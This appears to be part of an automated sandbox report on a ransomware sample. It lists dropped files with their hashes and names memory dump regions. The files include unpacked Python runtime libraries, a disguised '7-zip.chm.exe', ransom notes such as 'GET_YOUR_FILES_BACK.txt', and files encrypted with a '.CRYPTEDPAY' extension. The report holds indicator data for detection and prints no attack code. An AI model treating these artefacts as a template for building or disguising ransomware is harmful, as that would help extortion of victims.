| MD5 | 1559cf3605d62c03d6ff2440ea3e175f |
| SHA1 | 26faec2bafd8523d1705021d06c56947b58cda1c |
| SHA256 | b8da64fa424e5fb2bc8de93d2c0dcb55076cd9345452d3c624b3fcbbbe15644b |
| SHA512 | 1891a356ae98a09a7476697b6e7dd0de6b940043910a9aa414e17a523118d76dd0c55ea786d9bd2a77d792bdf95a75b272352eb813d928c429a707a78c09f05c |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\_bz2.pyd
| MD5 | 387725bc6de235719ae355dfaa81e67c |
| SHA1 | 428b74b0bf8acd04eb20dc5a016352042c812c7a |
| SHA256 | a9de8848c95518434cb5c2a9cb9d648cba140021e49f2e5212becf13a329b5d0 |
| SHA512 | bed2d6902f2ddd7dc7c2043c210ce682df75616ca63d163b756559dc7d33e926733f96d5407dc856061fba711ce41de9b01bb7b9db3940fa359c32c40d9f8233 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\_lzma.pyd
| MD5 | f6b74ac19fb0601a4e612a8dc0c916e3 |
| SHA1 | d4a77386caf7f70e66d5ec4543c8d9de0e4bc39f |
| SHA256 | ce2ea2c96afd8c0cf97fc55130f835b6625a0772d86b259ea82bbc0b3def75e6 |
| SHA512 | 0b60c51f76eb6872000d92bbec7fdabf687f5096fd12f1456cf26ad6033c22b998aee94842fda800288bef94790608204f97a7ed034544a1377cbf9722c6a826 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\pyexpat.pyd
| MD5 | 3e43bcc2897f193512990e9e9024111b |
| SHA1 | 11dec8c9a1c4b45de9c980125eaef462038c1f2a |
| SHA256 | 0d8ac2a2b81176a06b0fb8663702428d2cdd5bedeab68b04210bf5cb6b49a475 |
| SHA512 | e629f23a9ad1274b57a47b170e598e47f28984dc2aaf4985ded9b217f4288222190eabe5a9fd4b11fa3eadb42040d8a532090544bf46be288b7310966d126aac |
memory/5736-1392-0x0000000000400000-0x0000000000409000-memory.dmp
memory/5928-1394-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18202\libcrypto-1_1.dll
| MD5 | aad424a6a0ae6d6e7d4c50a1d96a17fc |
| SHA1 | 4336017ae32a48315afe1b10ff14d6159c7923bc |
| SHA256 | 3a2dba6098e77e36a9d20c647349a478cb0149020f909665d209f548dfa71377 |
| SHA512 | aa4b74b7971cb774e4ae847a226cae9d125fadc7cde4f997b7564dff4d71b590dcbc06a7103451b72b2afe3517ab46d3be099c3620c3d591ccbd1839f0e8f94a |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\MSVCP140.dll
| MD5 | 5ff1fca37c466d6723ec67be93b51442 |
| SHA1 | 34cc4e158092083b13d67d6d2bc9e57b798a303b |
| SHA256 | 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062 |
| SHA512 | 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\tk86t.dll
| MD5 | 6cadec733f5be72697d7112860a0905b |
| SHA1 | 6a6beeef3b1bb7c85c63f4a3410e673fce73f50d |
| SHA256 | 19f70dc79994e46d3e1ef6be352f5933866de5736d761faa8839204136916b3f |
| SHA512 | e6b3e52968c79d4bd700652c1f2ebd0366b492fcda4e05fc8b198791d1169b20f89b85ec69cefa7e099d06a78bf77ff9c3274905667f0c94071f47bafad46d79 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\tcl86t.dll
| MD5 | 30195aa599dd12ac2567de0815ade5e6 |
| SHA1 | aa2597d43c64554156ae7cdb362c284ec19668a7 |
| SHA256 | e79443e9413ba9a4442ca7db8ee91a920e61ac2fb55be10a6ab9a9c81f646dbb |
| SHA512 | 2373b31d15b39ba950c5dea4505c3eaa2952363d3a9bd7ae84e5ea38245320be8f862dba9e9ad32f6b5a1436b353b3fb07e684b7695724a01b30f5ac7ba56e99 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\_tkinter.pyd
| MD5 | a475634789bb1284d75e55870462a74a |
| SHA1 | af7bfe3ffeef7479549831c5cd0de487151a6c5f |
| SHA256 | 725a13950969db01ad20af1f36eb28d6011a2feb31bd8c112b6bed2d025bc761 |
| SHA512 | 9ca2f331d9ca22732ab0cf12a42d1b221f5daf01b5a83c43a4ba0b48798289d52428ab17cdedfde9eb2daf5f12304fe28e2c4d2306399b7fa562acdc74487a19 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\PIL\_imaging.cp39-win32.pyd
| MD5 | 78d94f3724c28ebb7c393342b5355f2e |
| SHA1 | 6e57576b09cf2688e804f684c8d10b55cff52bf9 |
| SHA256 | cf72bcff475a8855a0b3d10535fa6a4049fcb650e8f6e839f6ad614dce570c6a |
| SHA512 | 0c221fb0136fba654ccb65463fe0b526e33c5a386c0ce6202c922a745c285490a7164a861186a9e0c3c0b3a21654ce79cb21a8c3716489758feb6b0122e27f43 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\_hashlib.pyd
| MD5 | fdfa235f58a04d19e1ce923ca0d8ae19 |
| SHA1 | 4a1178ba7e9a56f8c68dc3391a169222c67237e9 |
| SHA256 | 7ad484e99ea33e4eea2cbf09203fb9dbd0c2c325b96e6cf2ffd146156c93bf7a |
| SHA512 | 0fe187e1019c159c0ee90fbc8eea20e40a28ff05223321d04784e577b60a2c0a3a476fabc71bd81dd08e7a127bb6cb03edf5d604bfdda38516fb2c90148dd118 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\_socket.pyd
| MD5 | a9450642d8832893998bd213d98d509b |
| SHA1 | 3ef416ffaa438a2809cdffddd1b2717461ead7d4 |
| SHA256 | 5407750d69d74318ec66bd1464558c07c06c6aa9edbc0641cd2dd7533378772b |
| SHA512 | 93027a694800d2d92ba773e8232ee016946ee9b36ba211537619df0508e9f50660b9a292d29dd4e90c2406b29bd3b1f8e4eb2226945b7163b2bd3227d4482323 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\_ctypes.pyd
| MD5 | aff88d04f5d45e739902084fce6da88a |
| SHA1 | 6ce6a89611069deaa7c74fa4fa86882dc21b5801 |
| SHA256 | 34371eb9b24ba67ce6803d965cf5f0fe88ef4762af648ec2183e5bf21835d876 |
| SHA512 | 8dd8f90ae1cc0fbc76f0039bc12e1aee7b2718017f4f9b09361001bed7b278b84f20d0fffceda4d5edd8744140cfdf1ca52497645d0480f5d42934f7df9808ba |
memory/6044-1413-0x0000000000400000-0x00000000005BB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18202\base_library.zip
| MD5 | 67d863a39e90cd2fa3c20f4b06ce8397 |
| SHA1 | 98a2e831f22a29d72850d1e7a3de863892dadf5f |
| SHA256 | 02cb3daf59557ea5b992663a29eee8e9ac3241f55d3f34a3fc829be19a381b1b |
| SHA512 | ac0536c7138325ff311fb6b7dcaaea0629c3535666b42097232a80046bbc8790b0d84e1b4164f7a4f675e47cd5fd4a28d0053714f44a3452297f05f30109fd3d |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\VCRUNTIME140.dll
| MD5 | 55c8e69dab59e56951d31350d7a94011 |
| SHA1 | b6af2d245ae4d67c38eb1cd31e0c1cffb29b9b2c |
| SHA256 | 9d8d21022ff9d3f6b81a45209662a4f3481edc2befae0c73b83cf942eab8be25 |
| SHA512 | efb2ac1891724df16268480628eb230b6ee37ed47b56d2e02a260559865cdd48ee340ce445e58f625e0f4d6dbdc5bfb7ce2eeedf564b837cff255ef7d1dc58cd |
memory/7816-1786-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7816-1787-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\Pictures\README.txt
| MD5 | dc4f14b4841f142d9fb5c2920186f536 |
| SHA1 | 5c151f82e0f99c7d11e41e001adb916d2adb2c0f |
| SHA256 | 17692594613b8217a63430bee1a234559903bbd8d7e798d46d34980c74a9fd2a |
| SHA512 | f9fd38e009eec846a5860817c8bea25ab8effb63bf9960718a6995158442b11186a6594fccaf2a0c198f81535dc637babd502315562a03a6186c21d65fd03c80 |
C:\Program Files\7-Zip\7-zip.chm.exe
| MD5 | 275af12209cd2c28381a8a3d8ce99f5b |
| SHA1 | a47160c198d69f54e953993821f7a4edd80b8133 |
| SHA256 | 0352c6e9fa28240acf7333b4f738b7da4554587bbc7cd6778bf84b75258aeddf |
| SHA512 | d50019ace490481b38b99b2dc8d19c932b4e6c196ec2c8fd872f13eb8cd7f57193f5cb46a43ba28e55c0eefaaa9fae999fcdf3cbe97837d6de16f4e4f5899052 |
C:\Users\Default\Saved Games\GET_YOUR_FILES_BACK.txt
| MD5 | c416bf3911487d819c45a4001a77b35f |
| SHA1 | dc19ce5f2f104f710edf83f7efa617f0bc749f67 |
| SHA256 | 76bbf445e90dffd6d609e98faad6f84f7dc99c5412026cfb1a6e224b1cb2e6e2 |
| SHA512 | b6ace2a4c58ec68a60b1e1640e5adc1abbc58c669bc0d24f1cc5e1a778d595b5c255c4cc0314f7b3e4a413759658c6c281dafaa59e1110d05119b17d00555e5d |
memory/5016-1825-0x00000000005F0000-0x0000000000607000-memory.dmp
memory/5016-1824-0x0000000000400000-0x000000000045F000-memory.dmp
memory/5736-1932-0x0000000000400000-0x0000000000409000-memory.dmp
memory/6092-1957-0x0000000000400000-0x0000000000533000-memory.dmp
memory/672-1964-0x0000000005860000-0x0000000005888000-memory.dmp
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\ReadMe.txt
| MD5 | d0fb4838a9b950e6311e0fd7d18c138c |
| SHA1 | 1f96f64bd12434d6216040a20d6631f9d9d35c7b |
| SHA256 | 87de37c3692d3b960ab8f73c7ecd12d7894cb2042ba5741ffbcf8e769f284d63 |
| SHA512 | d853cba6e1dcab9a36f61f1f495128c6e739637d6ec478fe4d0d2d8ab7fb8601131ffcd30538b5943ce3ef932e574394b3c899c6ecff7a19f97d1c27d0eee488 |
memory/7816-1994-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4180-2024-0x0000000006350000-0x0000000006372000-memory.dmp
memory/7616-2026-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7616-2028-0x0000000000400000-0x0000000000537000-memory.dmp
memory/6044-2558-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/6092-2997-0x0000000000400000-0x0000000000533000-memory.dmp
memory/7616-3935-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7616-3936-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7616-3937-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\Pictures\Recovery.bmp
| MD5 | db23b38264589a1fdddc763f96f9e77c |
| SHA1 | 1f66752e25ccf1db795046716d1b828476f86077 |
| SHA256 | 48f6c46e9c929e1c44607abcaacdff26093cb5822d52a114800865c96ae58a52 |
| SHA512 | 47d0ddf354d0e0edb7b752490ae90ece24c7a29ef0c2322756a8737bb063364594566dd04b66513b00db3ac5a4cb0c8bebcfc453ff941550aeb3d543414a4763 |
memory/6092-3951-0x0000000000400000-0x0000000000533000-memory.dmp
F:\ReadMe.txt.CRYPTEDPAY
| MD5 | a85082baa1d8adeae9d9743da58b3000 |
| SHA1 | 2ef0e4b1b3f114af57e88cdc8fba35837784433d |
| SHA256 | 742a72bddf5f4772d9615338b20459046f8746d3391912de037110d6eb13ed8e |
| SHA512 | 49488755f6223bb0a11c20e31b4318021aec213847b7ee916f8e334d37d51af4475732a8b51f53cd6624d92b095c669529de0948cef7ec26f8361b2f0b9210bb |
C:\Users\Admin\Contacts\ReadMe.txt
| MD5 | 20ed6ca26678eeb6a845c175c149951b |
| SHA1 | 296e7b147eac56c966903df1e6e76a4351870130 |
| SHA256 | 7c67ce4e7bc83101d62adc2a6a445e805548873c613e1fa75e387b0249233fcd |
| SHA512 | 0715fdc9293d16c8b8449e93eca7391491b3d8eca3e285fb87b0e15439529db9da42952f3dbc0e0aa2c04af084b6d3dc9ca1faa4cc186a811eea1aaa0f5d10c3 |
C:\Users\Admin\Favorites\Links\ReadMe.txt.CRYPTEDPAY
| MD5 | 374bb836b330cf038a7828870beaa732 |
| SHA1 | 67be8aeb44074f4b6fb561114176c4660e118a57 |
| SHA256 | 8921a2459cccd6e1e9bb6728c6f2a69cae4ba1919da63ca29499f18321c03df5 |
| SHA512 | 7be572e2b0d850d816dbecb5f74c638ac304852c0b66f02bbfaf1c038c19714b035a18188a33a83286e655684450417476feaf0ab70024f34d7533e87b20d09c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\fb9jlpni.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\ReadMe.txt.CRYPTEDPAY
| MD5 | 9bbad889e2383a2fd803c557dd8eb378 |
| SHA1 | 0dac20cbfbe806a3edf6129ab740ca660db4ff12 |
| SHA256 | b71fb6ed4dcf0a48ea3e4775eee2beedd1ec90762b5d5fd71f554d65af79c2fa |
| SHA512 | 5136dd0c2f7185af9a38d6af92df5ab1bbb5e72dee0dbff777168472b111f66a60d2393a9637792b3c241f9273217a32815455855bc2e6c80824e6b199ec0e81 |
memory/4180-4405-0x0000000006180000-0x0000000006194000-memory.dmp
memory/4180-4406-0x00000000061E0000-0x00000000061E6000-memory.dmp
memory/6800-4410-0x0000000000400000-0x000000000043C000-memory.dmp
memory/7616-4415-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7616-4412-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7616-4414-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7616-4416-0x0000000000400000-0x0000000000537000-memory.dmp
memory/6800-4417-0x0000000005840000-0x0000000005858000-memory.dmp
memory/7616-4420-0x0000000000400000-0x0000000000537000-memory.dmp
memory/6800-4439-0x0000000005410000-0x0000000005460000-memory.dmp